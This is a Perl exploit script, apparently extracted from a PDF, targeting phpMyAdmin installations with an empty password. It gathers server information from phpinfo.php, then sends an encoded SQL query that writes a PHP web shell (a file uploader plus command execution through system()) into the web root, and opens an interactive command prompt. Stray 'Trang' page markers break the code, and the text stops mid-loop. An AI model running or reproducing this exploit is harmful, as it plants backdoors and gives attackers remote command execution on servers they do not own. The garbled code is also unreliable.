print q{
Exploit for phpMyAdmin Null password
Usage: perl PMANull.pl <site> <path> <do>
Example: perl PMANull.pl www.target.com / 0 };
exit;
}
$ip = $ARGV[0];
$http = $ARGV[1];
$ip =~ s/(http:\/\/)//eg;
$id = $ARGV[2];
$http = "phpinfo.php";
$num = 0;
if($id==2) { goto CMDS; }
Trang 2#$data =
"username=andrejiao&from_url=%3C%7Bfrom_url%7D%3E&submit=Send+%3 E+%3E";
#$idata = (length($data));
$socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80')
or die"[-] Couldn't connect!\n";
print "[+] Connected!\n";
httpcon($socks,"GET",$ip,$http,"!");
print "[+] Exploiting Target \r\n";
while($ans = <$socks>){
if($ans =~ /<tr><td class="e">System <\/td><td
class="v">(.*)<\/td><\/tr>/) {
print "[+] System Info: $1\r\n";
$num++;
}
if($ans =~ /<tr><td class="e">safe_mode<\/td><td
class="v">(.*)<\/td><td class="v">/){
print "[+] Safe Mode: $1\r\n";
$num++;
Trang 3}
if($ans =~ /_SERVER\["SCRIPT_FILENAME"\]<\/td><td class="v">(.*)\/phpinfo.php<\/td>/){
print "[+] Path: $1\r\n";
$path = $1;
$num++;
}
}
if(($num<3) && (!defined($path))) {
print 'PHPInfo.php was not found\r\n';
print 'Would you like to continue <Y/N>:';
$tah = <STDIN>;
chomp($tah);
if($tah eq "Y") {
print 'Please insert script path:';
$path = <STDIN>;
} else {
die "[+] Bye!\r\n";
}
}
Trang 4$idata =
"is_js_confirmed=0&lang=en-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&pos=0&goto=db_ details.php&zero_rows=Your+SQL+query+has+been+executed+successfully&pre v_sql_query=&sql_query=use+mysql%3B%0D%0ACREATE+TABLE+temptab+
%28codetab+text%29%3B%0D%0AINSERT+INTO+temptab+%28codetab%29+ values+%28%27%3CFORM+ENCTYPE%3D%22multipart%2Fform%2Ddata%2 2+ACTION%3D%22helps%2Ephp%22+METHOD%3D%22POST%22%3E%3CI NPUT+TYPE%3D%22hidden%22+name%3D%22MAX%5FFILE%5FSIZE%22 +value%3D%22100000%22%3EUpload+this+file%3A+%3CINPUT+NAME%3D
%22userfile%22+TYPE%3D%22file%22%3E%3CINPUT+TYPE%3D%22submit
%22+VALUE%3D%22Send%22%3E%3C%2FFORM%3E%3C%3Fphp+move% 5Fuploaded%5Ffile%28%24userfile%2C+%22entrika%2Ephp%22%29%3B+%3F
%3E%3C%3Fphp+if+%28%21empty%28%24%5FGET%5B%22c%22%5D%29
%29+%7B+echo+%22%3Cpre%3E%22%3B+system%28%24%5FGET%5B%22c
%22%5D%29%3B+echo+%22%3C%2Fpre%3E%22%3B+%7D+exit%3B+%3F
%3E%27%29%3B%0D%0ASELECT+%2A+INTO+OUTFILE+%27$path%2Fhel ps%2Ephp%27+from+temptab%3B%0D%0ADROP+TABLE+temptab%3B%0D
%0AFLUSH+LOGS%3B+&show_query=1&SQL=Go&sql_file=&MAX_FILE_S IZE=16777216&sql_file_compression&charset_of_file=utf8";
$http = $ARGV[1];
$http = "read_dump.php";
#$http = "import.php";
$socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80')
or die"[-] Couldn't connect!\n";
httpcon($socks,"POST",$ip,$http,$idata);
Trang 5while($ans = <$socks>){
if($ans =~ /<p><b>Error<\/b><\/p>/){
print "[-] Error was found!\r\n";
$sqlerror = 1;
}
if(($sqlerror==2) && ($ans =~ /<\/pre>/)){ $sqlerror=0; die "[-] Error!\r\n"; }
if($sqlerror==2){ print "[-] Error: $ans"; }
if(($sqlerror==1) && ($ans =~ /<pre>/)){ $sqlerror=2; } }
print "[+] Shell Injected: $ip/$ARGV[1]/helps.php";
if($id==1) { die "[+] Bye!\r\n"; }
CMDS:
while (1){
$cout = 0;
print "\r\nCMD> ";
$cmd = <STDIN>;
chomp($cmd);
if(($cmd eq 'anquit') || (!defined($cmd))){
die "[+] Bye!";
}